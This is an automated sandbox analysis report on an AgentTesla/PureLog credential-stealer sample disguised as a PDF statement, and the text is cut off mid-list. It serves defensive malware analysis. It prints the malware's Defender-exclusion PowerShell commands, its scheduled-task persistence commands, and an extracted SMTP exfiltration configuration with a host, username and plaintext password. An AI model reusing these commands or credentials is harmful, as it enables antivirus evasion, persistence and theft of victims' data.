Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Statement of Account PDF.bat.exe

Overview

General Information

Sample name:Statement of Account PDF.bat.exe
Analysis ID:1432040
MD5:8db4915ba4e6bb27cb249554a18a9f4c
SHA1:fd3e06212f9da365c2106dcd808caf291ccb3a2a
SHA256:470e7bcb766a436b50d28e362621b59467b6e6aa4146b467f4175a8b5c9eaa04
Tags:AgentTeslabatexeShipping
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Statement of Account PDF.bat.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7080 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • gDdsxauPhk.exe (PID: 7440 cmdline: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • schtasks.exe (PID: 7668 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gDdsxauPhk.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • gDdsxauPhk.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • WerFault.exe (PID: 7796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • BjTxJte.exe (PID: 8032 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • schtasks.exe (PID: 7096 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp44D2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7220 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • WerFault.exe (PID: 7192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 1828 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • BjTxJte.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • schtasks.exe (PID: 7708 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp6598.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7752 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 8DB4915BA4E6BB27CB249554A18A9F4C)
    • WerFault.exe (PID: 7936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7400 -s 1788 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000001E.00000002.4081952252.000000000294B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000F.00000002.4080192144.0000000003081000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000F.00000002.4080192144.00000000030D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Statement of Account PDF.bat.exe.7600000.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.Statement of Account PDF.bat.exe.3949970.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.Statement of Account PDF.bat.exe.3949970.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Statement of Account PDF.bat.exe.7600000.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    25.2.BjTxJte.exe.4798530.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 38 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ProcessId: 7156, ProcessName: powershell.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ProcessId: 7252, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BjTxJte
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ProcessId: 7156, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe, ParentImage: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe, ParentProcessId: 7440, ParentProcessName: gDdsxauPhk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp216B.tmp", ProcessId: 7668, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.195.61, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, Initiated: true, ProcessId: 7252, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", ProcessId: 7080, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ProcessId: 7156, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Statement of Account PDF.bat.exe", ParentImage: C:\Users\user\Desktop\Statement of Account PDF.bat.exe, ParentProcessId: 6984, ParentProcessName: Statement of Account PDF.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp", ProcessId: 7080, ProcessName: schtasks.exe

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 25.2.BjTxJte.exe.4798530.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeVirustotal: Detection: 56%Perma Link
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeVirustotal: Detection: 56%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: Statement of Account PDF.bat.exeReversingLabs: Detection: 47%
                      Source: Statement of Account PDF.bat.exeVirustotal: Detection: 56%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Statement of Account PDF.bat.exeJoe Sandbox ML: detected
                      Source: Statement of Account PDF.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2
                      Source: Statement of Account PDF.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Data.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Accessibility.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbu source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Configuration.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdb source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr, WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Core.pdbMZ@ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: System.Xml.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Xml.ni.pdbRSDS# source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdbt source: WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbMZ source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: Accessibility.pdbSystem.ni.dllSystem.Core.dll4 source: WER211D.tmp.dmp.24.dr
                      Source: Binary string: mscorlib.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Drawing.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: UbK.pdbSHA256 source: Statement of Account PDF.bat.exe, gDdsxauPhk.exe.0.dr, BjTxJte.exe.8.dr
                      Source: Binary string: System.Core.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.pdb4 source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: Accessibility.pdbMZ source: WERFDF5.tmp.dmp.17.dr
                      Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.ni.pdb source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Data.pdb, source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WER211D.tmp.dmp.24.dr, WERFDF5.tmp.dmp.17.dr, WER4195.tmp.dmp.32.dr
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BjTxJte.exe_f5c09dd75b90d612af8c658c8837992c387ee89_843aacda_4690c535-c6af-41e6-8128-f3000ded106c\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_gDdsxauPhk.exe_e2c8de6e9dfbc3bf198524a8a8bae3ea56c2edb2_cb724c00_6c828731-bc0c-4d10-93b3-5ed4934f0644\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
                      Source: global trafficTCP traffic: 192.168.2.4:49736 -> 50.87.195.61:587
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 50.87.195.61 50.87.195.61
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficTCP traffic: 192.168.2.4:49736 -> 50.87.195.61:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: mail.fascia-arch.com
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003227000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.000000000356C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002A42000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 